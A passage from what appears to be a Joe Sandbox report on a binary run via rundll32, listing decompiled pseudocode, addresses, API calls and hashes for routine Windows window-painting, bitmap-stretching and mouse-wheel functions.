					_t198 = E027EC054( *((intOrPtr*)(_v8 + 0x28c))) - 1;
					if(_t198 >= 0) {
						_t199 = _t198 + 1;
						_t225 = 0;
						do {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x2c))();
							_t225 = _t225 + 1;
							_t199 = _t199 - 1;
						} while (_t199 != 0);
					}
					E027DD6B4(_v8 + 0x284);
					E0282D844(_v8);
					_pop(_t218);
					 *[fs:eax] = _t218;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x24))(0x280a3a2);
					_t166 = _v8;
					 *((char*)(_t166 + 0x288)) = 0;
					return _t166;
				}
			}



























                          0x0280a185
                          0x0280a187
                          0x0280a18e
                          0x0280a191
                          0x0280a196
                          0x0280a197
                          0x0280a19c
                          0x0280a19f
                          0x0280a1a5
                          0x0280a1ba
                          0x0280a1bf
                          0x0280a1c5
                          0x0280a1ca
                          0x0280a1db
                          0x0280a1f7
                          0x0280a207
                          0x0280a225
                          0x0280a229
                          0x0280a239
                          0x0280a23e
                          0x0280a240
                          0x0280a251
                          0x0280a26d
                          0x0280a27a
                          0x0280a27a
                          0x0280a27f
                          0x0280a281
                          0x0280a292
                          0x0280a2ae
                          0x0280a2ae
                          0x0280a229
                          0x0280a2b3
                          0x0280a2bb
                          0x0280a2dc
                          0x0280a2dc
                          0x0280a2eb
                          0x0280a3a5
                          0x0280a3ac
                          0x0280a3b7
                          0x0280a3cd
                          0x0280a3cd
                          0x0280a3de
                          0x0280a3eb
                          0x0280a3fd
                          0x0280a3fe
                          0x0280a403
                          0x0280a405
                          0x0280a407
                          0x0280a40c
                          0x0280a40d
                          0x0280a412
                          0x0280a415
                          0x0280a41c
                          0x0280a435
                          0x0280a437
                          0x0280a439
                          0x0280a450
                          0x0280a452
                          0x0280a454
                          0x0280a456
                          0x0280a456
                          0x0280a45c
                          0x0280a46d
                          0x0280a476
                          0x0280a47c
                          0x0280a47c
                          0x0280a439
                          0x0280a481
                          0x0280a483
                          0x0280a486
                          0x0280a489
                          0x0280a496
                          0x0280a2f1
                          0x0280a2fc
                          0x0280a302
                          0x0280a314
                          0x0280a32b
                          0x0280a33e
                          0x0280a341
                          0x0280a343
                          0x0280a344
                          0x0280a346
                          0x0280a353
                          0x0280a356
                          0x0280a357
                          0x0280a357
                          0x0280a346
                          0x0280a362
                          0x0280a370
                          0x0280a377
                          0x0280a37a
                          0x0280a38d
                          0x0280a390
                          0x0280a393
                          0x0280a39a
                          0x0280a39a

                          APIs
                            • Part of subcall function 0280E14C: SendMessageA.USER32(00000000,00000141,?,00000000), ref: 0280E16C
                          • GetWindow.USER32(00000000,00000005), ref: 0280A1B5
                          • GetWindowLongA.USER32(00000000,000000FC), ref: 0280A1D3
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0280A1F7
                          • GetWindow.USER32(00000000,00000005), ref: 0280A21A
                          • GetWindow.USER32(00000000,00000000), ref: 0280A220
                          • GetWindowLongA.USER32(00000000,000000FC), ref: 0280A249
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0280A26D
                          • GetWindow.USER32(00000000,00000002), ref: 0280A275
                          • GetWindowLongA.USER32(00000000,000000FC), ref: 0280A28A
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0280A2AE
                          • SendMessageA.USER32(00000000,000000D3,00000003,00000000), ref: 0280A2DC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Long$MessageSend
                          • String ID:
                          • API String ID: 1593136606-0
                          • Opcode ID: 2dcfb36cc9aa811cb1366df8c62b97abfcad706ff2fa7d49064c6103d4a1bc63
                          • Instruction ID: b67b8e32c233b37c8ac2ad9fb56ef05b816da23747a25a6f76eddc335a8b3299
                          • Opcode Fuzzy Hash: 2dcfb36cc9aa811cb1366df8c62b97abfcad706ff2fa7d49064c6103d4a1bc63
                          • Instruction Fuzzy Hash: 57A1DA78A05604EFDB55EBA8C988F9DB7F5EB08700F6541E0A508EB3A1CB71AE40DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FC5C4 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E027FC5C4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t78;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				char _t87;
				void* _t94;
				void* _t140;
				intOrPtr* _t170;
				intOrPtr _t178;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t186;
				int* _t190;
				intOrPtr _t192;
				void* _t194;
				void* _t195;
				intOrPtr _t196;

				_t171 = __ecx;
				_t194 = _t195;
				_t196 = _t195 + 0xffffffe4;
				_t190 = __ecx;
				_v8 = __edx;
				_t170 = __eax;
				_t192 =  *((intOrPtr*)(__eax + 0x28));
				_t178 =  *0x27fc810; // 0xf
				E027F85C0(_v8, __ecx, _t178);
				E027FCC40(_t170);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *(_t192 + 0x10);
				if(_t78 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t85);
				_t86 = _t85 * _t84;
				if(_t86 > 8) {
					L4:
					_t87 = 0;
				} else {
					_t171 =  *(_t192 + 0x28) & 0x0000ffff;
					if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
						_t87 = 1;
					} else {
						goto L4;
					}
				}
				if(_t87 == 0) {
					if(E027FC950(_t170) == 0) {
						SetStretchBltMode(E027F84EC(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t194);
				_push(0x27fc800);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196;
				if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
					E027FCBE0(_t170, _t171);
				}
				_t94 = E027FC894(_t170);
				_t182 =  *0x27fc810; // 0xf
				E027F85C0(_t94, _t171, _t182);
				if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t190, _t190[1], _t190[2] -  *_t190, _t190[3] - _t190[1],  *(E027FC894(_t170) + 4), 0, 0,  *(_t192 + 0x1c),  *(_t192 + 0x20),  *(_v8 + 0x20));
					_pop(_t184);
					 *[fs:eax] = _t184;
					_push(0x27fc807);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t194);
					_push(0x27fc795);
					_push( *[fs:eax]);
					 *[fs:eax] = _t196;
					_v28 = E027F88E4(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t192 + 0xc));
					E027F8A88( *(_v8 + 4), _t170, _t190[1],  *_t190, _t190, _t192, 0, 0, _v28,  *(_t192 + 0x20),  *(_t192 + 0x1c), 0, 0,  *(E027FC894(_t170) + 4), _t190[3] - _t190[1], _t190[2] -  *_t190);
					_t140 = 0;
					_pop(_t186);
					 *[fs:eax] = _t186;
					_push(0x27fc7da);
					if(_v32 != 0) {
						_t140 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t140;
				}
			}


























                          0x027fc5c4
                          0x027fc5c5
                          0x027fc5c7
                          0x027fc5cd
                          0x027fc5cf
                          0x027fc5d2
                          0x027fc5d4
                          0x027fc5d7
                          0x027fc5e0
                          0x027fc5e7
                          0x027fc5ee
                          0x027fc5f1
                          0x027fc5f5
                          0x027fc5fa
                          0x027fc60b
                          0x027fc615
                          0x027fc61a
                          0x027fc61a
                          0x027fc62c
                          0x027fc636
                          0x027fc63d
                          0x027fc63e
                          0x027fc643
                          0x027fc654
                          0x027fc654
                          0x027fc645
                          0x027fc649
                          0x027fc652
                          0x027fc658
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027fc652
                          0x027fc65c
                          0x027fc69f
                          0x027fc6ac
                          0x027fc6ac
                          0x027fc65e
                          0x027fc669
                          0x027fc677
                          0x027fc68f
                          0x027fc68f
                          0x027fc6b3
                          0x027fc6b4
                          0x027fc6b9
                          0x027fc6bc
                          0x027fc6c8
                          0x027fc6cc
                          0x027fc6cc
                          0x027fc6d3
                          0x027fc6d8
                          0x027fc6de
                          0x027fc6ec
                          0x027fc7d5
                          0x027fc7dc
                          0x027fc7df
                          0x027fc7e2
                          0x027fc7eb
                          0x00000000
                          0x027fc7fa
                          0x027fc7ff
                          0x027fc6f2
                          0x027fc6f4
                          0x027fc6f9
                          0x027fc6fe
                          0x027fc6ff
                          0x027fc704
                          0x027fc707
                          0x027fc716
                          0x027fc726
                          0x027fc760
                          0x027fc765
                          0x027fc767
                          0x027fc76a
                          0x027fc76d
                          0x027fc776
                          0x027fc780
                          0x027fc780
                          0x027fc789
                          0x00000000
                          0x027fc78f
                          0x027fc794
                          0x027fc794

                          APIs
                            • Part of subcall function 027FCC40: GetDC.USER32(00000000), ref: 027FCC96
                            • Part of subcall function 027FCC40: GetDeviceCaps.GDI32(00000000,0000000C), ref: 027FCCAB
                            • Part of subcall function 027FCC40: GetDeviceCaps.GDI32(00000000,0000000E), ref: 027FCCB5
                            • Part of subcall function 027FCC40: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,027FB78B,00000000,027FB817), ref: 027FCCD9
                            • Part of subcall function 027FCC40: ReleaseDC.USER32(00000000,00000000), ref: 027FCCE4
                          • SelectPalette.GDI32(?,?,000000FF), ref: 027FC606
                          • RealizePalette.GDI32(?), ref: 027FC615
                          • GetDeviceCaps.GDI32(?,0000000C), ref: 027FC627
                          • GetDeviceCaps.GDI32(?,0000000E), ref: 027FC636
                          • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 027FC669
                          • SetStretchBltMode.GDI32(?,00000004), ref: 027FC677
                          • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 027FC68F
                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 027FC6AC
                          • CreateCompatibleDC.GDI32(00000000), ref: 027FC70C
                          • SelectObject.GDI32(?,?), ref: 027FC721
                          • SelectObject.GDI32(?,00000000), ref: 027FC780
                          • DeleteDC.GDI32(00000000), ref: 027FC78F
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                          • String ID:
                          • API String ID: 2414602066-0
                          • Opcode ID: 6ef32ae21a0a10de50ed1e3a6879a67ae299c5cae93af5ae265ab85a2b967211
                          • Instruction ID: 2480f993b33f26dadbdfface735585476e2d8c76f366ee32cc7f5b90ca65e4a3
                          • Opcode Fuzzy Hash: 6ef32ae21a0a10de50ed1e3a6879a67ae299c5cae93af5ae265ab85a2b967211
                          • Instruction Fuzzy Hash: 86710BB5A08209AFDB92DFA8C989F5ABBFDAB08710F118559B608D7751D734E900CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F88F4 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E027F88F4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;

				_t93 = _t94;
				_t95 = _t94 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t77 = __ecx;
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				_push(_t93);
				_push(0x27f8a42);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						E027F883C(_t77);
					}
					_push(_t93);
					_push(0x27f89b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						E027F883C(_t77);
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x27f89b8);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t78 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t78 != 0) {
							SelectObject(_v28, _t78);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(0x27f8a49);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}




















                          0x027f88f5
                          0x027f88f7
                          0x027f8902
                          0x027f8903
                          0x027f8904
                          0x027f8906
                          0x027f8910
                          0x027f891a
                          0x027f891f
                          0x027f8920
                          0x027f8925
                          0x027f8928
                          0x027f8935
                          0x027f893c
                          0x027f895d
                          0x027f8964
                          0x027f8966
                          0x027f8966
                          0x027f896d
                          0x027f896e
                          0x027f8973
                          0x027f8976
                          0x027f898a
                          0x027f8991
                          0x027f8993
                          0x027f8993
                          0x027f899a
                          0x027f899d
                          0x027f89a0
                          0x027f89b0
                          0x027f893e
                          0x027f8951
                          0x027f89bc
                          0x027f89cb
                          0x027f89da
                          0x027f8a01
                          0x027f8a08
                          0x027f8a0f
                          0x027f8a0f
                          0x027f8a16
                          0x027f8a1d
                          0x027f8a1d
                          0x027f8a16
                          0x027f8a24
                          0x027f8a27
                          0x027f8a2a
                          0x027f8a33
                          0x027f8a41
                          0x027f8a41

                          APIs
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F890B
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F8915
                          • GetObjectA.GDI32(?,00000018,?), ref: 027F8935
                          • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 027F894C
                          • GetDC.USER32(00000000), ref: 027F8958
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 027F8985
                          • ReleaseDC.USER32(00000000,00000000), ref: 027F89AB
                          • SelectObject.GDI32(?,?), ref: 027F89C6
                          • SelectObject.GDI32(?,00000000), ref: 027F89D5
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 027F8A01
                          • SelectObject.GDI32(?,00000000), ref: 027F8A0F
                          • SelectObject.GDI32(?,00000000), ref: 027F8A1D
                          • DeleteDC.GDI32(?), ref: 027F8A33
                          • DeleteDC.GDI32(?), ref: 027F8A3C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                          • String ID:
                          • API String ID: 644427674-0
                          • Opcode ID: d1016f65e73a3556ee6b6a39b98399247386cfb7433692c7b29b77ce6e6fa93d
                          • Instruction ID: 4091ab9c750b3d9b18d6ad0b928e2db164e45cebf3f43d0dada16e2c0ce41160
                          • Opcode Fuzzy Hash: d1016f65e73a3556ee6b6a39b98399247386cfb7433692c7b29b77ce6e6fa93d
                          • Instruction Fuzzy Hash: B64109B6E04309AFEB51EBE8DC49FAEB7BDEB08710F410414BA04E7240D775A9008B65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02834CB0 Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                          Download Yara Rule
                          C-Code - Quality: 57%
                          			E02834CB0(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				intOrPtr* _t195;
				intOrPtr* _t198;
				intOrPtr _t207;
				void* _t210;
				intOrPtr _t218;
				signed int _t236;
				void* _t239;
				void* _t241;
				intOrPtr _t242;

				_t239 = _t241;
				_t242 = _t241 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_v16 = GetWindowDC(E02833F7C(_v8));
					_push(_t239);
					_push(0x2834f16);
					_push( *[fs:edx]);
					 *[fs:edx] = _t242;
					GetClientRect(E02833F7C(_v8),  &_v32);
					GetWindowRect(E02833F7C(_v8),  &_v48);
					MapWindowPoints(0, E02833F7C(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t210 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t210 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t210 = _t210 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t236 = GetWindowLongA(E02833F7C(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t210;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t210;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t210;
						}
						if((_t236 & 0x00200000) != 0) {
							_t198 =  *0x2864444; // 0x2865890
							_v48.right = _v48.right +  *((intOrPtr*)( *_t198))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t210;
						}
						if((_t236 & 0x00100000) != 0) {
							_t195 =  *0x2864444; // 0x2865890
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t195))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x2863f88 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x2863f98 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x2863fa8 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x2863fb8 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E027F7CD8( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t218);
					 *[fs:eax] = _t218;
					_push(0x2834f1d);
					return ReleaseDC(E02833F7C(_v8), _v16);
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t207 = E0280B168(E0280B088());
					if(_t207 != 0) {
						_t207 = _v8;
						if(( *(_t207 + 0x52) & 0x00000002) != 0) {
							_t207 = E0280B850(E0280B088(), 0, _v8);
						}
					}
					return _t207;
				}
			}


















                          0x02834cb1
                          0x02834cb3
                          0x02834cb9
                          0x02834cbc
                          0x02834cc9
                          0x02834ce9
                          0x02834cee
                          0x02834cef
                          0x02834cf4
                          0x02834cf7
                          0x02834d07
                          0x02834d19
                          0x02834d2f
                          0x02834d44
                          0x02834d5d
                          0x02834d68
                          0x02834d69
                          0x02834d6a
                          0x02834d6b
                          0x02834d7b
                          0x02834d86
                          0x02834d87
                          0x02834d88
                          0x02834d89
                          0x02834d94
                          0x02834d9a
                          0x02834da6
                          0x02834dab
                          0x02834dab
                          0x02834dbb
                          0x02834dc0
                          0x02834dc0
                          0x02834dd6
                          0x02834de2
                          0x02834de4
                          0x02834de4
                          0x02834df1
                          0x02834df3
                          0x02834df3
                          0x02834e00
                          0x02834e02
                          0x02834e02
                          0x02834e0b
                          0x02834e0f
                          0x02834e18
                          0x02834e18
                          0x02834e25
                          0x02834e27
                          0x02834e27
                          0x02834e30
                          0x02834e34
                          0x02834e3d
                          0x02834e3d
                          0x02834e9d
                          0x02834e9d
                          0x02834eb6
                          0x02834ec1
                          0x02834ec2
                          0x02834ec3
                          0x02834ec4
                          0x02834ed5
                          0x02834ef1
                          0x02834ef8
                          0x02834efb
                          0x02834efe
                          0x02834f15
                          0x02834f1d
                          0x02834f25
                          0x02834f2d
                          0x02834f34
                          0x02834f36
                          0x02834f3d
                          0x02834f49
                          0x02834f49
                          0x02834f3d
                          0x02834f54
                          0x02834f54

                          APIs
                          • GetWindowDC.USER32(00000000), ref: 02834CE4
                          • GetClientRect.USER32(00000000,?), ref: 02834D07
                          • GetWindowRect.USER32(00000000,?), ref: 02834D19
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02834D2F
                          • OffsetRect.USER32(?,?,?), ref: 02834D44
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 02834D5D
                          • InflateRect.USER32(?,00000000,00000000), ref: 02834D7B
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 02834DD1
                          • DrawEdge.USER32(?,?,00000000,00000008), ref: 02834E9D
                          • IntersectClipRect.GDI32(?,?,?,?,?), ref: 02834EB6
                          • OffsetRect.USER32(?,?,?), ref: 02834ED5
                          • FillRect.USER32(?,?,00000000), ref: 02834EF1
                          • ReleaseDC.USER32(00000000,?), ref: 02834F10
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                          • String ID:
                          • API String ID: 3115931838-0
                          • Opcode ID: db0ba8c56d3c25c2690d912c28c71128f489478f0765ecf8410e398d313d8250
                          • Instruction ID: c95754c4fa979fd565d2b163af559c8dc5051c758b0cc10e60e64a57e0d9be66
                          • Opcode Fuzzy Hash: db0ba8c56d3c25c2690d912c28c71128f489478f0765ecf8410e398d313d8250
                          • Instruction Fuzzy Hash: 7A911C79E00548AFDB42DBA8D988EEEB7FAAF09304F1444A4F518E7251C735AE04CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D707C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D707C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                          0x027d7083
                          0x027d7085
                          0x027d7087
                          0x027d7099
                          0x027d70a8
                          0x027d70b4
                          0x027d70c0
                          0x027d70c5
                          0x027d70e4
                          0x027d70cb
                          0x027d70db
                          0x027d70db
                          0x027d70e9
                          0x027d7106
                          0x027d70ef
                          0x027d70ff
                          0x027d70ff
                          0x027d7113

                          APIs
                          • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 027D7094
                          • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 027D70A0
                          • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 027D70AF
                          • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 027D70BB
                          • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 027D70D3
                          • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 027D70F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                          • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                          • API String ID: 1416857345-3736581797
                          • Opcode ID: fea502fed1ac553271916791ba74b60135fb9086e99c98c10681c9b96741b8c4
                          • Instruction ID: a0e41441913f62f469f2b6cc42c9d31e194344da05b0029aab540f76094777fe
                          • Opcode Fuzzy Hash: fea502fed1ac553271916791ba74b60135fb9086e99c98c10681c9b96741b8c4
                          • Instruction Fuzzy Hash: 121170B0200306BFF7199F66EC81B66F7B9EF88310F208566F9419B244E7B19C40CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0280B850 Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                          Download Yara Rule
                          C-Code - Quality: 59%
                          			E0280B850(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				signed int _t79;
				int _t80;
				int _t81;
				void* _t94;
				intOrPtr _t107;
				void* _t116;
				void* _t119;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t122 = _t124;
				_t125 = _t124 + 0xffffffbc;
				_t94 = __ecx;
				_v8 = __edx;
				_t116 = __eax;
				_t43 = GetWindowLongA(E02833F7C(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E02833F7C(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_v12 = GetWindowDC(E02833F7C(_v8));
					_push(_t122);
					_push(0x280b9ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t125;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t119 = _t116;
					if(_t94 != 0) {
						_t79 = GetWindowLongA(E02833F7C(_v8), 0xfffffff0);
						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
							_t80 = GetSystemMetrics(2);
							_t81 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
